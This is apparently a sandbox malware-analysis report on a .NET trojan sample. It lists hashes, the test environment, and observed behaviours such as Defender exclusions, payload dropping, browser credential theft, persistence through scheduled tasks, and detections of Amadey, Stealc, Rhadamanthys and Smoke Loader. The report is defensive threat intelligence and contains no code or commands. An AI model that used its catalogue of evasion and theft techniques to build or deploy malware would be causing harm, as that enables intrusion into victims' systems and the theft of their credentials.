Malware analysis SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942 Malicious activity

Add for printing

File name:	SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942
Full analysis:	https://app.any.run/tasks/8d0b9de6-3d10-42b5-8776-66ee98b6547e
Verdict:	Malicious activity
Threats:	Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. GCleaner is a type of malware loader that has the capability to deliver numerous malicious software programs, which differ based on the location of the targeted victim. This malware is commonly spread through fraudulent websites that advertise free PC optimization tools A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Rhadamanthys is a C++ information-stealing malware that extracts sensitive data from infiltrated machines. Its layered operational chain and advanced evasion tactics make it a major risk in cybersecurity landscapes. The main function of Smoke Loader is dropping other, more destructive malware on infected machines. However, unlike many competing loaders, this one can be extended via plugins to feature destructive, malicious info-stealing functions. Stealc is a stealer malware that targets victims’ sensitive data, which it exfiltrates from browsers, messaging apps, and other software. The malware is equipped with advanced features, including fingerprinting, control panel, evasion mechanisms, string obfuscation, etc. Stealc establishes persistence and communicates with its C2 server through HTTP POST requests. Stealc ist eine Stealer-Malware, die es auf die sensiblen Daten der Opfer abgesehen hat, die sie aus Browsern, Messaging-Apps und anderer Software exfiltriert. Die Malware ist mit fortschrittlichen Funktionen ausgestattet, darunter Fingerprinting, Bedienfeld, Umgehungsmechanismen, String-Verschleierung usw. Stealc stellt eine Persistenz her und kommuniziert mit seinem C2-Server über HTTP-POST-Anfragen. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	November 09, 2023, 05:28:05
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	opendir loader gcleaner stealc stealer rhadamanthys amadey botnet onlylogger phishing smoke neoreklami
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:	65ACBF192DDEF924085504F07E559AD7
SHA1:	991FFA6FAE12E521118BF1800FB9D534037C04FC
SHA256:	CCCC4690ACE16E44F44473C2DF179B5B17E27F863B33ABDA126199014CB224D8
SSDEEP:	6144:lWtuykMCEGs7e4IaLLWCfxMRhU+G36vzgymktD2FqJFCS7tQPD7f8u4GnfF5Kuwj:otuykbEGs7e4IWyCob6LHEB5rMT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.18860 KB4052978
Adobe Acrobat Reader DC MUI (15.007.20033)
Adobe Flash Player 27 ActiveX (27.0.0.187)
Adobe Flash Player 27 NPAPI (27.0.0.187)
Adobe Flash Player 27 PPAPI (27.0.0.187)
CCleaner (5.35)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.177.11)
Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.4763.1000)
Microsoft Office Proof (French) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Single Image 2010 (14.0.4763.1000)
Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (64-bit x64) (7.5.1)
PowerShell 7-x64 (7.2.11.0)
Skype version 8.100 (8.100)
Update for Microsoft .NET Framework 4.7.1 (KB4054852) (1)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)

Add for printing

MALICIOUS
- Adds path to the Windows Defender exclusion list
  - SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe (PID: 2704)
  - explorer.exe (PID: 1944)
- Create files in the Startup directory
  - CasPol.exe (PID: 2844)
- Drops the executable file immediately after the start
  - CasPol.exe (PID: 2844)
  - o9kOQt6dAsZEYb9XTfo7zLZf.exe (PID: 2268)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
  - 0013737115.exe (PID: 2484)
  - OgowUitadx4J3D0Zle3jzlME.exe (PID: 2412)
  - Install.exe (PID: 2992)
  - Utsysc.exe (PID: 2472)
  - VqAZY2Gsltzix48asvMIup6y.exe (PID: 2380)
  - Install.exe (PID: 1728)
  - updater.exe (PID: 3008)
- GCLEANER has been detected (SURICATA)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
- STEALC has been detected (SURICATA)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Connects to the CnC server
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - explorer.exe (PID: 1944)
- Runs injected code in another process
  - LHYhRKOrUi44QbBSQySt1MAJ.exe (PID: 1788)
- Steals credentials
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - rundll32.exe (PID: 2788)
  - rundll32.exe (PID: 2280)
- RHADAMANTHYS has been detected (SURICATA)
  - dialer.exe (PID: 1680)
- Application was injected by another process
  - explorer.exe (PID: 1944)
- Changes the autorun value in the registry
  - Utsysc.exe (PID: 2472)
- Uses Task Scheduler to run other applications
  - Utsysc.exe (PID: 2472)
  - Install.exe (PID: 1728)
  - explorer.exe (PID: 1944)
  - jlBQQYw.exe (PID: 2892)
- AMADEY has been detected (SURICATA)
  - Utsysc.exe (PID: 2472)
- Steals credentials from Web Browsers
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - rundll32.exe (PID: 2788)
  - rundll32.exe (PID: 2280)
- ONLYLOGGER has been detected (YARA)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
- Run PowerShell with an invisible window
  - powershell.EXE (PID: 2600)
  - powershell.EXE (PID: 1828)
  - powershell.EXE (PID: 2576)
- Starts CMD.EXE for self-deleting
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
- Actions looks like stealing of personal data
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - rundll32.exe (PID: 2788)
  - dllhost.exe (PID: 1672)
  - rundll32.exe (PID: 2280)
  - jlBQQYw.exe (PID: 2892)
- Unusual connection from system programs
  - rundll32.exe (PID: 2788)
  - rundll32.exe (PID: 2280)
  - rundll32.exe (PID: 2772)
  - rundll32.exe (PID: 1180)
- Modifies hosts file to block updates
  - VqAZY2Gsltzix48asvMIup6y.exe (PID: 2380)
- Creates a writable file the system directory
  - powershell.exe (PID: 1172)
  - jlBQQYw.exe (PID: 2892)
- Neoreklami has been detected
  - jlBQQYw.exe (PID: 2892)
- SMOKE has been detected (SURICATA)
  - explorer.exe (PID: 1944)
SUSPICIOUS
- Starts POWERSHELL.EXE for commands execution
  - SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe (PID: 2704)
  - explorer.exe (PID: 1944)
- Reads the Internet Settings
  - SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe (PID: 2704)
  - CasPol.exe (PID: 2844)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
  - 0013737115.exe (PID: 2484)
  - Utsysc.exe (PID: 2472)
  - Install.exe (PID: 1728)
  - powershell.EXE (PID: 2600)
  - cmd.exe (PID: 2424)
  - rundll32.exe (PID: 2788)
  - powershell.exe (PID: 308)
  - rundll32.exe (PID: 2280)
  - Utsysc.exe (PID: 2820)
  - rundll32.exe (PID: 2772)
  - rundll32.exe (PID: 1180)
  - Utsysc.exe (PID: 1172)
  - powershell.EXE (PID: 1828)
  - powershell.EXE (PID: 2576)
- Connects to the server without a host name
  - CasPol.exe (PID: 2844)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
- Script adds exclusion path to Windows Defender
  - SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe (PID: 2704)
  - explorer.exe (PID: 1944)
- Reads settings of System Certificates
  - CasPol.exe (PID: 2844)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
- Application launched itself
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 3068)
  - LHYhRKOrUi44QbBSQySt1MAJ.exe (PID: 1632)
  - explorer.exe (PID: 1944)
  - evhtujv (PID: 364)
- Reads security settings of Internet Explorer
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Checks Windows Trust Settings
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Connects to unusual port
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - dialer.exe (PID: 1680)
  - dllhost.exe (PID: 1672)
  - explorer.exe (PID: 1040)
- Process requests binary or script from the Internet
  - CasPol.exe (PID: 2844)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - Utsysc.exe (PID: 2472)
- Process communicates with Telegram (possibly using it as an attacker's C2 server)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Searches for installed software
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - dllhost.exe (PID: 1672)
- The process checks if it is being run in the virtual environment
  - dialer.exe (PID: 1680)
- Starts CMD.EXE for commands execution
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
  - forfiles.exe (PID: 2548)
  - forfiles.exe (PID: 1228)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - explorer.exe (PID: 1944)
  - jlBQQYw.exe (PID: 2892)
- The process drops Mozilla's DLL files
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Starts itself from another location
  - 0013737115.exe (PID: 2484)
  - OgowUitadx4J3D0Zle3jzlME.exe (PID: 2412)
- The process drops C-runtime libraries
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Drops 7-zip archiver for unpacking
  - CasPol.exe (PID: 2844)
  - OgowUitadx4J3D0Zle3jzlME.exe (PID: 2412)
- Reads browser cookies
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Process drops legitimate windows executable
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Reads the BIOS version
  - Install.exe (PID: 1728)
- Found strings related to reading or modifying Windows Defender settings
  - forfiles.exe (PID: 2548)
  - forfiles.exe (PID: 1228)
  - jlBQQYw.exe (PID: 2892)
- Uses REG/REGEDIT.EXE to modify registry
  - cmd.exe (PID: 2564)
  - cmd.exe (PID: 2552)
  - cmd.exe (PID: 312)
  - cmd.exe (PID: 1192)
- Loads DLL from Mozilla Firefox
  - dllhost.exe (PID: 1672)
  - rundll32.exe (PID: 2788)
  - rundll32.exe (PID: 2280)
- Accesses Microsoft Outlook profiles
  - dllhost.exe (PID: 1672)
  - rundll32.exe (PID: 2788)
  - rundll32.exe (PID: 2280)
- The process executes via Task Scheduler
  - powershell.EXE (PID: 2600)
  - Utsysc.exe (PID: 2820)
  - Utsysc.exe (PID: 1172)
  - jlBQQYw.exe (PID: 2892)
  - powershell.EXE (PID: 1828)
  - evhtujv (PID: 364)
  - powershell.EXE (PID: 2576)
- Uses TIMEOUT.EXE to delay execution
  - cmd.exe (PID: 2668)
- Uses NETSH.EXE to obtain data on the network
  - rundll32.exe (PID: 2788)
  - rundll32.exe (PID: 2280)
- Uses RUNDLL32.EXE to load library
  - rundll32.exe (PID: 1940)
  - rundll32.exe (PID: 2040)
- Starts SC.EXE for service management
  - cmd.exe (PID: 1844)
  - cmd.exe (PID: 2892)
- Uses powercfg.exe to modify the power settings
  - cmd.exe (PID: 1716)
  - cmd.exe (PID: 3068)
- Executes as Windows Service
  - updater.exe (PID: 3008)
  - raserver.exe (PID: 2848)
- Uses TASKKILL.EXE to kill process
  - cmd.exe (PID: 392)
- Unusual connection from system programs
  - powershell.exe (PID: 1172)
- Drops a system driver (possible attempt to evade defenses)
  - updater.exe (PID: 3008)
- The Powershell connects to the Internet
  - powershell.exe (PID: 1172)
- Starts application with an unusual extension
  - evhtujv (PID: 364)
INFO
- Checks supported languages
  - SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe (PID: 2704)
  - CasPol.exe (PID: 2844)
  - LHYhRKOrUi44QbBSQySt1MAJ.exe (PID: 1632)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 3068)
  - Q9yM42KmSsUdQCLfj0rBuk2R.exe (PID: 2620)
  - LHYhRKOrUi44QbBSQySt1MAJ.exe (PID: 1788)
  - AppLaunch.exe (PID: 1784)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
  - o9kOQt6dAsZEYb9XTfo7zLZf.exe (PID: 2268)
  - FQWtLzA7ZBFGcslKu0INSzgX.exe (PID: 2972)
  - iXINopQIc8EtXdM1c7vsbmzh.exe (PID: 2516)
  - 0013737115.exe (PID: 2484)
  - VqAZY2Gsltzix48asvMIup6y.exe (PID: 2380)
  - Utsysc.exe (PID: 2472)
  - OgowUitadx4J3D0Zle3jzlME.exe (PID: 2412)
  - Install.exe (PID: 1728)
  - Install.exe (PID: 2992)
  - updater.exe (PID: 3008)
  - Utsysc.exe (PID: 2820)
  - Utsysc.exe (PID: 1172)
  - evhtujv (PID: 364)
  - jlBQQYw.exe (PID: 2892)
  - evhtujv (PID: 2788)
- Reads the computer name
  - SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe (PID: 2704)
  - CasPol.exe (PID: 2844)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - FQWtLzA7ZBFGcslKu0INSzgX.exe (PID: 2972)
  - 0013737115.exe (PID: 2484)
  - Utsysc.exe (PID: 2472)
  - iXINopQIc8EtXdM1c7vsbmzh.exe (PID: 2516)
  - Install.exe (PID: 1728)
- Reads Environment values
  - CasPol.exe (PID: 2844)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
- Reads the machine GUID from the registry
  - SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe (PID: 2704)
  - CasPol.exe (PID: 2844)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
  - 0013737115.exe (PID: 2484)
  - Utsysc.exe (PID: 2472)
  - iXINopQIc8EtXdM1c7vsbmzh.exe (PID: 2516)
  - Install.exe (PID: 1728)
- Creates files or folders in the user directory
  - CasPol.exe (PID: 2844)
  - LgZETwjBuyt3U7y3AtTrHm4V.exe (PID: 2800)
  - D8CyX1GPoa6iBwqhMctvb7Yb.exe (PID: 2728)
  - explorer.exe (PID: 1944)
  - Utsysc.exe (PID: 2472)
- Create files in a temporary directory
  - CasPol.exe (PID: 2844)
  - o9kOQt6dAsZEYb9XTfo7zLZf.exe (PID: 2268)
